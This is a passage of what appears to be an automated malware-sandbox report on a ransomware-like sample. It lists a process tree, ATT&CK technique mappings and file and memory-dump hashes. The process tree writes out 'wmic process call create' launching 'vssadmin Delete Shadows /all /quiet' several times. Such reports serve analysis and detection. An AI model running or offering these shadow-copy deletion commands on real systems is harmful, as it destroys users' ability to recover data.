  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1924
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:916

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1248

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2064

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:1544
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:1256
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:868

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1468

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1196

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:3016
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:2624
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2360

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2668

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
134b74458db8157e93034277eac474b5

SHA1
88a02f99ab68fd17cb6d47a2e4c80610d5beac8d

SHA256
1397507fba0a3fcce1af9fe8b4d6887c18f25799c544eb76194659eb86ec4520

SHA512
36fbdd9fb7967268015ca047c6f03e3507ac0fc5cdf279e874b5d131220b31020dc8a545dec0a7b9fe03c73c12baef54aa1d2b2cd52f3e03044a4aacf11c715a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1ce711da33e720f54903fa516a245afe

SHA1
45654dd76bbbaaa799bd29fd45cce44bd4aff675

SHA256
2873ef0bc29e356ad8e16597d229770d69b4211df1f539b2e72e8e40b29bea5f

SHA512
e11741b751e0f805b4f6f397d60e98373f6976f4880ab1fb9e4691dc4174420c5f800dcd3d32a0e1fe1def5df376ca7972d5263dead804a1fa691b43540ac952

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
db2014d96342b52438e4acdfadf8d7f9

SHA1
9da3d31a1f997b3bfccf3ddf0dff8933b74387e0

SHA256
33d5d934d10ab91ae28f037ab225a759c3d948e37c0d6a8cd77be3ead5e9f074

SHA512
47ee708e47f1da62cc292032e57d510551c64c3d936af839af4a4f1ee9194abca5ad1e10dd61890a0782b426764356ec41eee6e852d8ea9e6005cb088da99953

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e04439afbd56e6ca868228824b41b823

SHA1
8d1eabdfdbd3b4b832e010190dfe1861d84933e2

SHA256
71dc797f3ebbd24e215506f78c69c9a3a09e7687346b0382c36e1ba10575a304

SHA512
5449b7752f26f0922ee9f88fa70e090e131735710c3c273d7c7c773192e49ef789dedafe34b14f02935d53d2231852368da894d7670c14b1828e4137f7b964cb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
848709adea0fa31917bfd79b6c830c0f

SHA1
8e689f62211945a2ce21cca5923b680a996a33e6

SHA256
7a637e8f4429240a02ff0ad123f413d6f9b3897d04aaf5d18ae3e13b2c0df7c4

SHA512
457a62420cd181f8ebad8a4f9192c4e3b7ff03bea1bec48075f3e3a8dbcfb1635ef59df92ec9078f896bad7d61e7ecd7c21c397ad3d40837a20c4502f0042d5c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
51b9fe7f7f08b9411320af9df3b0158a

SHA1
d4f640e85fcb96b77d542ad14bf494e24793f15f

SHA256
cfdda3f55e1f4b1239456e8a602af4af653dbf105217bad928cf73fbb0d22f9a

SHA512
ff2f2e94c0b121df8f165b822f9c053a31fab00f309f3b21c7f3b0116dff4d21b6412599b7d26791c6f46faefeb62e66ace762671bbd6466f79312e9546fa3f7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e52cc36c42bbfbcbcd3faf388dd1ad98

SHA1
59a7286d664aaeb5d3938796d40abb6c5cfb8507

SHA256
5d423421614a31241219c8062dfebb241215c4904d76c880aaae48b1e0a9b3fb

SHA512
426342af1920cf5165170a4ec835bd1f59cc69d427b9a6b01f52205bd3cfba6b40181a62362225589bbd13cb7ebf2ca5db0e6cf84235e1cacdeefa93b9ffb831

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8417f7756af4aba299e77f468c50e876

SHA1
47eb9e7e442bb2474dc73b1b799c9187d0fc239a

SHA256
2b1f4158bbabce5d4241cf39bc436d4e7f5a83e47f2ab38b4f20127ba67fa8a2

SHA512
8f4de9c37b39fa80864cbc6182770b0d447726dee09653ddbdf2f0746ba32a09ec853cea160ad6b9a4ea10beef843d9bb6546b57c85dc39ace439adb6552a36a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
042f01095f74c5e746ce0a3ab0bc53a1

SHA1
ecf672534e5308bd1b472cc1a29f1ee37471dafb

SHA256
319b4c0b141669bba5b26004bd302457472d4df668b5335292752d78893a2640

SHA512
9995bd006ff91c692b486984fda07963df92a258bdb99bbb7962fde66ffedfa1b7cd321298be03207c0f5041a9acdfe446edc8ae8ab95455506cb4412dad2f86

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b90113fac634f0e5c08173311f48d696

SHA1
884a2e568597291b326a250e217dde37caa13873

SHA256
039508f124756ce707c7d1b55a0354f401768656be827a94a5fdd507c532b7fc

SHA512
72d5b2cef21445ed0f5c9652df1459dfd2dd8225b0d47b89ef069ce30af60acfe5f194af982d89e322a3cd31e710bbe68967ba1cce0b6e5da42c7b20d65c3677

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e18785b1a35713b1a60070711090f7c2

SHA1
71fe5d6094543b737c082a70c0356fedc0daf210

SHA256
b026f8f1ea92a93696b82c3a54bcdf2f45e79a6a07dee32ddfa50691855d8b96

SHA512
1028f2d407e9edcd3716dbe4da340e312eba858572264bccf6b18627339c1df83bbbc50f3b1c9c0c35b9dcea75d14a474a323ce794addfb170f2ddfb9207d43d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3be4f746b5162768ec6fb198ec063d54

SHA1
c483ad7c5ba85ea28b7a34409eabeae06b0ec94a

SHA256
0ff0a4084c2bfc44e0b247161baad318569880cd66df1f8008fb25e0a3293b6f

SHA512
c515b3dfd61048ce2b78acc23cd49f2a6630b314f11b59e7dc3b206f2c8d6d6a1c48b6a87f0504bc18250b18d26118986f240673ecf0f1debaa888c5d1657cfe

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5bfae86fdff85bb92eae9a6f5405332e

SHA1
3f0a41e5eb9efe56561c7e67950691afca626204

SHA256
3d1162a21dc468c8d1142552101721632191964b6b2d54bf590a4c0f410edd5e

SHA512
8230f765936f3c8616725e0485f699a232bcb0020af4ed40e2701ead45aa9a22f0a1c9588e8965e966c2450a40ac0d8ba60a08249a89e0efef379e7de306db0f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9323309614b6f8f7c3daa7637c3c5b93

SHA1
fbd983021dd0dc0078195e76061052fda3631940

SHA256
b0585b161be30fbd5ce2f8c710118a51ee8c49c3f3fcd452af6a6f30e89175e2

SHA512
59ae129e0d4c90c4faf8d2fd935c41b32921fbac5abc6be94d3c2e0417acdc00f5d6498154d153979aed3b893b9f0f53585e29532da93cd8028b2786d89c46c3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1dc99d55a252b726fe2856decee01030

SHA1
5d4a779b72b1530bcf7d16871f84771283de7567

SHA256
7fa53a5a2403f47f5f8dd19f58009627c12fd9098a51dd1ace32b774fe09d7a0

SHA512
ef18475a81876debc6a01ac32683118a38352335ce527d7106f8ab3417b004ceb81d87c7263082a04db79fb57c80b8ad58e7b9a75c0f8b0534c0ca4b5cb52f98

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9f03018a63e84100f8d8018dd33294e3

SHA1
4d7539d20856a18db0448c107f461aa840f03615

SHA256
30ebfd9019c642f66b138201bc2dac524c915956f409cbd01398838390abb0f3

SHA512
79cafa3d6b0bbfa5a9cf27c257801b50f48d58ae7690d319893651f5c36d9fb03a10d99c8adcc795b1a8c8e9a96ef092abd7a9cf5545189a7a2e44f7e933f5e8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0d928bb01e24a230629d171251ecdae2

SHA1
dd24a6b9218034d92cc647bb947de79a48531664

SHA256
594ce7225776ab6cddd979b862e4ee30e25a8fbf51b0046ca14a9f36ba5ced33

SHA512
6b2c8e5c7203bcd8ca12b283c3d7874e121243e001fcf991200739aec89e4298e5b3344142a4257570c2beefc1cbd3a509bba10e2fef3b8af74b3182f20cb73c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7981989649089c9a5dd12c0288547d7b

SHA1
004d8d90d39fdaced69f54c7cb1d8232fa649d89

SHA256
ed9fbf2a48592ca4d6d43686a045af071cfbb9918f95f103bfa32c4cf3a22ea2

SHA512
ceb8487d705233c990fde04644272d3858a1885c50c029e6ba89f6aa516774d4c814edb0a2eed1c68a1925bd741eefadceb1315789d36e70db86b7b12b16b816

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1381e1f9967497e2a1cc672a33c99c86

SHA1
eafdd29abb91ba400837950370fee24cd715fdb9

SHA256
f3560928cb1c8febfaa674c09137125acfbd22d4ea24d78a5582930063fc43c2

SHA512
6252b1d3fe09088a594e6109a6ee1f31a094ccca93615fe40a8a65770707252938ced0f6660d3ca3b65619cfa21c3c5b1486be709c5303b68ebb3d687188eae1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5033.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar50E4.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
2bfbe6b54d637ac57e6165cccec37a0f

SHA1
cbce8aa5a9bb48c730f1eb747bce2b5586133994

SHA256
304080111afc8d9e36f24806b43d1eb9cdddae1e263f9a5559a1f6efb46a3e76

SHA512
1e4a69dfc88e73e1787e821a2f59eeb5de46e06fe13b4772cd78305716aabe228a498b8d2ac82c1ce9b08fa72a33e1d4f428e430a7131ee6178ef7f675908190

Download Submit
memory/1052-12-0x0000000001FF0000-0x0000000001FF5000-memory.dmp

Filesize
20KB

Download
memory/2432-1-0x00000000001A0000-0x00000000001A1000-memory.dmp

Filesize
4KB

Download
memory/2432-8-0x0000000001DA0000-0x0000000001DA1000-memory.dmp

Filesize
4KB

Download
memory/2432-10-0x0000000001DD0000-0x0000000001DD1000-memory.dmp

Filesize
4KB

Download
memory/2432-9-0x0000000001DB0000-0x0000000001DB1000-memory.dmp

Filesize
4KB

Download
memory/2432-7-0x0000000000210000-0x0000000000211000-memory.dmp

Filesize
4KB

Download
memory/2432-6-0x0000000000200000-0x0000000000201000-memory.dmp

Filesize
4KB

Download
memory/2432-5-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/2432-4-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download
memory/2432-3-0x00000000001C0000-0x00000000001C1000-memory.dmp

Filesize
4KB

Download
memory/2432-2-0x00000000001B0000-0x00000000001B1000-memory.dmp

Filesize
4KB

Download
memory/2432-0-0x0000000001F00000-0x0000000002772000-memory.dmp

Filesize
8.4MB

Download
memory/2432-11-0x0000000002790000-0x0000000002791000-memory.dmp

Filesize
4KB

Download